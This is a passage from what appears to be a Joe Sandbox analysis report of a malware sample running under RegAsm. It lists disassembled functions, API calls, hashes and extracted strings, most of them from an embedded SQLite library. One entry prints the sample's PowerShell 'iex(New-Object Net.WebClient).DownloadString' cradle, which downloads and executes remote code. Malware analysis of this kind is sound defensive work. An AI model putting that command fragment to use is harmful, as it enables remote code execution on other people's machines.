                                              • API called with NULL prepared statement, xrefs: 1B79FB65
                                              • %s at line %d of [%.10s], xrefs: 1B79FBA5
                                              • misuse, xrefs: 1B79FBA0
                                              • API called with finalized prepared statement, xrefs: 1B79FB7A
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                              • API String ID: 0-860711957
                                              • Opcode ID: e3eb1be39b5265feb14d228d5057c3f1b6a48e7edf64e8fcf46d5f0f1161d024
                                              • Instruction ID: 784bf378e69fe191e88db53eed27295488f7c5ad8693490dec76575fbf92242f
                                              • Opcode Fuzzy Hash: e3eb1be39b5265feb14d228d5057c3f1b6a48e7edf64e8fcf46d5f0f1161d024
                                              • Instruction Fuzzy Hash: E7B1C0B4A047419FD710AF34F849B9B77E4BB45B28F04492CF89A8B281E775F449C7A2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %z%s%Q$%z, %Q HIDDEN, %s HIDDEN)$CREATE TABLE x($rank
                                              • API String ID: 0-3324442540
                                              • Opcode ID: 5500cb9362451da9812ba2c04c6923035a1c92dc7256de880911cf746b7b22e7
                                              • Instruction ID: cc25ad238edc3c67e6ac7e92214141327b3febe68b4e8db27d80ed457ddd3882
                                              • Opcode Fuzzy Hash: 5500cb9362451da9812ba2c04c6923035a1c92dc7256de880911cf746b7b22e7
                                              • Instruction Fuzzy Hash: C781E2B1940312AFDB008F25EC84BDEB7E4FF44665F04062AFC88AB210D735E954CBA2
                                              Strings
                                              • unable to close due to unfinalized statements or unfinished backups, xrefs: 1B7875D1
                                              • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B7874CD
                                              • invalid, xrefs: 1B7874BC
                                              • %s at line %d of [%.10s], xrefs: 1B7874DC
                                              • misuse, xrefs: 1B7874D7
                                              • API call with %s database connection pointer, xrefs: 1B7874C1
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
                                              • API String ID: 0-3800776574
                                              • Opcode ID: 240fe35d1fe477bdd85ed141216e0b4c34b23c803624230f5ef966d60250f41e
                                              • Instruction ID: c29bed29cfa7f2b9f63c03a25754d27c610d9c24e3442525eb8313d6a4396188
                                              • Opcode Fuzzy Hash: 240fe35d1fe477bdd85ed141216e0b4c34b23c803624230f5ef966d60250f41e
                                              • Instruction Fuzzy Hash: 755145B5A40702ABD7118F38EC49BDFB3A4AF40A14F054018F8AF97241E730F5A5C2A6
                                              Strings
                                              • PRAGMA %Q.page_size, xrefs: 1B72BD03
                                              • SELECT length(data) FROM '%q'.'%q_node' WHERE nodeno = 1, xrefs: 1B72BD67
                                              • undersize RTree blobs in "%q_node", xrefs: 1B72BDA1
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: PRAGMA %Q.page_size$SELECT length(data) FROM '%q'.'%q_node' WHERE nodeno = 1$undersize RTree blobs in "%q_node"
                                              • API String ID: 0-3485589083
                                              • Opcode ID: 796e2e8ca23c381326c6bbec83aa7eb9d059d6118a16d3dbc578d43bf08ff99d
                                              • Instruction ID: 395010a56e28501811696de753087ea2323cc5e0a9b88c38fa87d390c7caaea4
                                              • Opcode Fuzzy Hash: 796e2e8ca23c381326c6bbec83aa7eb9d059d6118a16d3dbc578d43bf08ff99d
                                              • Instruction Fuzzy Hash: 723101F1A40212AFDB048F24DC85AEAB3F8EB44716F0401A6FD49D6311E736E958CBE1
                                              APIs
                                              • CreateDCA.GDI32(00000000,00000000,00000000,00000001), ref: 0041119D
                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 004111A8
                                              • GetDeviceCaps.GDI32(00000000,0000000A), ref: 004111B3
                                              • ReleaseDC.USER32(00000000,00000000), ref: 004111BE
                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,?,004160EE,?,00000000,?,Display Resolution: ,00000000,?,004277F0,00000000,?), ref: 004111CA
                                              • HeapAlloc.KERNEL32(00000000,?,00000000,?,?,004160EE,?,00000000,?,Display Resolution: ,00000000,?,004277F0,00000000,?,00000000), ref: 004111D1
                                              • wsprintfA.USER32 ref: 004111E3
                                                • Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CapsDeviceHeap$AllocCreateProcessReleaselstrcpywsprintf
                                              • String ID: %dx%d
                                              • API String ID: 3940144428-2206825331
                                              • Opcode ID: 6b3a9271b659d38bc6f9758ef7b6618ae4811ec0de7a721b5e74bf37eacd1b5d
                                              • Instruction ID: 362ef291c8d2e0918a789945f0526d92947b659a326dae23e2a11bbba191b05b
                                              • Opcode Fuzzy Hash: 6b3a9271b659d38bc6f9758ef7b6618ae4811ec0de7a721b5e74bf37eacd1b5d
                                              • Instruction Fuzzy Hash: 5DF0D13A601220BBD7205BA1DC4DDDF7F7EEF4BBA5B000011FB0597250CA744A80CBA1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                              • API String ID: 0-2528248365
                                              • Opcode ID: c11623e58a1136488fdc3c65470f536b3658eb0e29bd28274739cb008b7c5dd7
                                              • Instruction ID: 71fc9a8aab74d129de4620c7f597f5b605b3a81d22e9ac96c4b1a2c04687cd4b
                                              • Opcode Fuzzy Hash: c11623e58a1136488fdc3c65470f536b3658eb0e29bd28274739cb008b7c5dd7
                                              • Instruction Fuzzy Hash: E5F15670A047529FD700DF2DC8C4AEABBE0FF44615F454169F8888B662E335E95AC7A1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (FK)
                                              • API String ID: 0-1642768157
                                              • Opcode ID: 55defdb5d59891eef840411d4b9768ab00bf27c63a5d3701c0ac2f7e5b8f8513
                                              • Instruction ID: 4bc1617295bd520bbd0fdbaf3bcc434e21fddfce5614b75c002cf52316b0cd5f
                                              • Opcode Fuzzy Hash: 55defdb5d59891eef840411d4b9768ab00bf27c63a5d3701c0ac2f7e5b8f8513
                                              • Instruction Fuzzy Hash: A881E3B67052019FEB049F28FC40BA6B3A1FB85235F24466EF546CB6E1EB32E510CB50
                                              Strings
                                              • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B6AECCB
                                              • %s at line %d of [%.10s], xrefs: 1B6AECDA
                                              • %.*s%s, xrefs: 1B6AEC88
                                              • database corruption, xrefs: 1B6AECD5
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %.*s%s$%s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                              • API String ID: 0-894757972
                                              • Opcode ID: 75998b578658a7af4e2e1642aaeb610b183d8ce2281e4946c112c56cbffc6e8b
                                              • Instruction ID: d48b0551c82444bf2b98e513eebf3ab258376127a790a43d306a5975bafbef76
                                              • Opcode Fuzzy Hash: 75998b578658a7af4e2e1642aaeb610b183d8ce2281e4946c112c56cbffc6e8b
                                              • Instruction Fuzzy Hash: A2611FB4A043418BCB14CF24CD81AEBB7E2AF98700F24496CF89A9B340E731ED45CB91
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 00412380
                                                • Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735
                                                • Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
                                                • Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
                                                • Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
                                                • Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3
                                                • Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802
                                                • Part of subcall function 00411944: _EH_prolog.MSVCRT ref: 00411949
                                                • Part of subcall function 00411944: GetSystemTime.KERNEL32(?,004274F0,00000001,000000C8,00000000,0042770F), ref: 00411989
                                                • Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
                                                • Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
                                                • Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B
                                              • ShellExecuteEx.SHELL32(?), ref: 00412544
                                              Strings
                                              • ')", xrefs: 00412481
                                              • .ps1, xrefs: 00412433
                                              • C:\ProgramData\, xrefs: 004123C2
                                              • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 0041245D
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 004124C6
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prologlstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$.ps1$C:\ProgramData\$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              • API String ID: 416170631-1989157005
                                              • Opcode ID: 8d675afc14cc62a0c1ba82dbf6450172f6168594811f9f228a98776fff0139b8
                                              • Instruction ID: 2317cddda8ff2502209b036727239b083d757f9d95c555f692b17e0c1ab20cb7
                                              • Opcode Fuzzy Hash: 8d675afc14cc62a0c1ba82dbf6450172f6168594811f9f228a98776fff0139b8
                                              • Instruction Fuzzy Hash: 9B619471C05248EEDB05EBE5D995BDEBBB4AF18308F50419EE01563182DFB82BC8CB65
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                              • API String ID: 0-2528248365
                                              • Opcode ID: 29fbedab53fcf9526cae8193b86cac43ec31a6df647dde8fdfc59af5a0e1c8f0
                                              • Instruction ID: 68a8a80ec2876f098db441e4400edbf3b68c06c2130afaf1028266749b1e5725
                                              • Opcode Fuzzy Hash: 29fbedab53fcf9526cae8193b86cac43ec31a6df647dde8fdfc59af5a0e1c8f0
                                              • Instruction Fuzzy Hash: BF510475709340ABC300DA28CC84AEFB7E1FB88616F944869F58AD7762E336E585C761
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: [%!g,%!g],$[%!g,%!g]]
                                              • API String ID: 0-3388633204
                                              • Opcode ID: 78f135c4e0275045d8cc3a95f2fc58c3ef3cd6dce65955fdc0bff0847124181c
                                              • Instruction ID: d592a2a482e0936d77aca4e167666fad4a9be82446c1de2c9ee9841e0547e575
                                              • Opcode Fuzzy Hash: 78f135c4e0275045d8cc3a95f2fc58c3ef3cd6dce65955fdc0bff0847124181c
                                              • Instruction Fuzzy Hash: CE5123B09007169BDB10DF69CCC5BDBB7B4AF56710F008629F84D9B280E771E489CBA2
                                              Strings
                                              • INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');, xrefs: 1B6AF33F
                                              • unable to validate the inverted index for FTS%d table %s.%s: %s, xrefs: 1B6AF418
                                              • malformed inverted index for FTS%d table %s.%s, xrefs: 1B6AF3F3
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');$malformed inverted index for FTS%d table %s.%s$unable to validate the inverted index for FTS%d table %s.%s: %s
                                              • API String ID: 0-2809892521
                                              • Opcode ID: ceaa173bcd6099b747c0b642b384223497e605d849435d6d5c82d8c7675e6975
                                              • Instruction ID: 5ff9fcd67aea7b9ade4d49559afc346846139592736c7b77298015146cf8111a
                                              • Opcode Fuzzy Hash: ceaa173bcd6099b747c0b642b384223497e605d849435d6d5c82d8c7675e6975
                                              • Instruction Fuzzy Hash: 1441D4F29812229BDB14EF39DC89AEB37ACEF50A65F04442AFC45C2181D731D559CBE2
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ef9bc361ae3474b21639a132a58aba64f028cb6e51941eb5dbb3e3cd302f48cd
                                              • Instruction ID: 54d11bd53e9125da080c6790b20866bb34bdd7e78ba4e2467693c41cef626245
